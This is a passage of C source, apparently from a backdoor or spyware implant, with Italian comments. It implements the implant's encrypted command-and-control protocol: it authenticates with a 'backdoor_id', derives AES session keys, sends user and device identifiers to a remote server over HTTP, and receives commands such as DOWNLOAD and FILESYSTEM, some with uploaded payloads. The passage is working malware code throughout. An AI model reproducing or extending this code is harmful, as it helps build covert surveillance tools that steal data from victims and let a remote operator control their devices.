memcpy(ptr, nonce_payload, 16);
ptr+=16;
memcpy(ptr, backdoor_id, bid_len);
ptr+=16;
memcpy(ptr, instance, inst_len);
ptr+=20;
memcpy(ptr, subtype, sub_len);
ptr+=16;
for (i=0; i<5; i++)
sha.Message_Digest[i] = ntohl(sha.Message_Digest[i]);
memcpy(ptr, sha.Message_Digest, sizeof(sha.Message_Digest));
ptr+=SHA_DIGEST_LENGTH;
memset(ptr, 8, AUTH_REAL_LEN-(ptr-buffer)); // Padda fino alla fine con 8
// Cifra il buffer
aes_set_key( &crypt_ctx, (BYTE *)signature, 128);
memset(iv, 0, sizeof(iv));
aes_cbc_encrypt(&crypt_ctx, iv, buffer, buffer, AUTH_REAL_LEN);
rand_pad_len = (rand()%15)+1;
rand_bin_seq(buffer+AUTH_REAL_LEN, rand_pad_len);
// Invia la richiesta
if (!HttpTransaction(buffer, AUTH_REAL_LEN + rand_pad_len, &response, &response_len, WIRESPEED))
return FALSE;
// Parsa la prima parte della reply
if (response_len != 64) {
SAFE_FREE(response);
return FALSE;
}
aes_set_key( &crypt_ctx, (BYTE *)signature, 128);
memset(iv, 0, sizeof(iv));
aes_cbc_decrypt(&crypt_ctx, iv, response, response, 32);
if (response[16]!=16) {
SAFE_FREE(response);
return FALSE;
}
memcpy(server_key, response, sizeof(server_key));
SHA1Reset(&sha);
SHA1Input(&sha, (BYTE *)conf_key, 16);
SHA1Input(&sha, (BYTE *)server_key, 16);
SHA1Input(&sha, (BYTE *)client_key, 16);
if (!SHA1Result(&sha)) {
SAFE_FREE(response);
return FALSE;
}
for (i=0; i<5; i++)
sha.Message_Digest[i] = ntohl(sha.Message_Digest[i]);
memcpy(asp_global_session_key, sha.Message_Digest, 16);
// Parsa la seconda parte della reply
aes_set_key( &crypt_ctx, (BYTE *)asp_global_session_key, 128);
memset(iv, 0, sizeof(iv));
ptr = response + 32;
aes_cbc_decrypt(&crypt_ctx, iv, ptr, ptr, 32);
if (memcmp(ptr, nonce_payload, 16)) {
SAFE_FREE(response);
return FALSE;
}
ptr+=16;
*response_command = *((DWORD *)ptr);
SAFE_FREE(response);
return TRUE;
}
// Fa il passo ID
// Ritorna il response message (che va poi liberato) di dimensione response_message_len
BYTE *H_ASP_ID(WCHAR *user_id, WCHAR *device_id, WCHAR *source_id, DWORD *response_message_len)
{
BYTE *response = NULL;
BYTE *message = NULL, *ptr = NULL;
BYTE *p_usr = NULL, *p_dev = NULL, *p_src = NULL;
DWORD l_usr, l_dev, l_src;
DWORD buffer_len;
DWORD response_len;
BYTE *buffer = NULL;
DWORD response_command;
BYTE *response_message = NULL;
DWORD version = atoi(CLIENT_VERSION);
p_usr = PascalizeString(user_id, &l_usr);
p_dev = PascalizeString(device_id, &l_dev);
p_src = PascalizeString(source_id, &l_src);
do {
if (!p_usr || !p_dev || !p_src)
break;
// Costruisce il messaggio
if (!(ptr = message = (BYTE *)malloc(sizeof(DWORD) + l_usr + l_dev + l_src)))
break;
memcpy(ptr, &version, sizeof(DWORD));
ptr += sizeof(DWORD);
memcpy(ptr, p_usr, l_usr);
ptr += l_usr;
memcpy(ptr, p_dev, l_dev);
ptr += l_dev;
memcpy(ptr, p_src, l_src);
// Crea il comando
if (!(buffer = PreapareCommand(PROTO_ID, message, sizeof(DWORD)+l_usr+l_dev+l_src, &buffer_len)))
break;
// Invia il buffer
if (!HttpTransaction(buffer, buffer_len, &response, &response_len, WIRESPEED))
break;
// Parsa la risposta
if (!(ptr = ParseResponse(response, response_len, &response_command, response_message_len)) || response_command == PROTO_NO || *response_message_len == 0)
break;
// Passa al chiamante il messaggio ritornato
if (! (response_message = (BYTE *)malloc(*response_message_len)))
break;
memcpy(response_message, ptr, *response_message_len);
} while(0);
SAFE_FREE(p_usr);
SAFE_FREE(p_dev);
SAFE_FREE(p_src);
SAFE_FREE(message);
SAFE_FREE(buffer);
SAFE_FREE(response);
return response_message;
}
// Usato per i comandi che ricevono un buffer in memoria (DOWNLOAD e FILESYSTEM)
// Se il server torna un messaggio, response_message viene allocato (va liberato dal chiamante)
BOOL H_ASP_GenericCommand(DWORD command, DWORD *response_command, BYTE **response_message, DWORD *response_message_len)
{
BYTE *response = NULL;
DWORD response_len;
DWORD buffer_len;
BYTE *buffer = NULL;
BOOL ret_val = FALSE;
BYTE *ptr = NULL;
*response_message = NULL;
*response_message_len = 0;
*response_command = PROTO_NO;
do {
// Crea il comando
if (!(buffer = PreapareCommand(command, NULL, 0, &buffer_len)))
break;
// Invia il buffer
if (!HttpTransaction(buffer, buffer_len, &response, &response_len, WIRESPEED))
break;
// Parsa la risposta
if (!(ptr = ParseResponse(response, response_len, response_command, response_message_len)))
break;
if (*response_command == PROTO_OK && *response_message_len > 0) {
// Passa al chiamante il messaggio ritornato
if (! (*response_message = (BYTE *)malloc(*response_message_len)))
break;
memcpy(*response_message, ptr, *response_message_len);
}
ret_val = TRUE;
} while(0);
SAFE_FREE(buffer);
SAFE_FREE(response);
return ret_val;
}
// Usato per i comandi che ricevono un buffer in memoria (DOWNLOAD e FILESYSTEM)
// Se il server torna un messaggio, response_message viene allocato (va liberato dal chiamante)
// Permette anche l'invio di un payload
BOOL H_ASP_GenericCommandPL(DWORD command, BYTE *payload, DWORD payload_len, DWORD *response_command, BYTE **response_message, DWORD *response_message_len)
{
BYTE *response = NULL;
DWORD response_len;
DWORD buffer_len;
BYTE *buffer = NULL;
BOOL ret_val = FALSE;
BYTE *ptr = NULL;
*response_message = NULL;
*response_message_len = 0;
*response_command = PROTO_NO;
do {
// Crea il comando
if (!(buffer = PreapareCommand(command, payload, payload_len, &buffer_len)))
break;
// Invia il buffer
if (!HttpTransaction(buffer, buffer_len, &response, &response_len, WIRESPEED))
break;
// Parsa la risposta
if (!(ptr = ParseResponse(response, response_len, response_command, response_message_len)))
break;
if (*response_command == PROTO_OK && *response_message_len > 0) {
// Passa al chiamante il messaggio ritornato
if (! (*response_message = (BYTE *)malloc(*response_message_len)))
break;
memcpy(*response_message, ptr, *response_message_len);
}
ret_val = TRUE;
} while(0);
SAFE_FREE(buffer);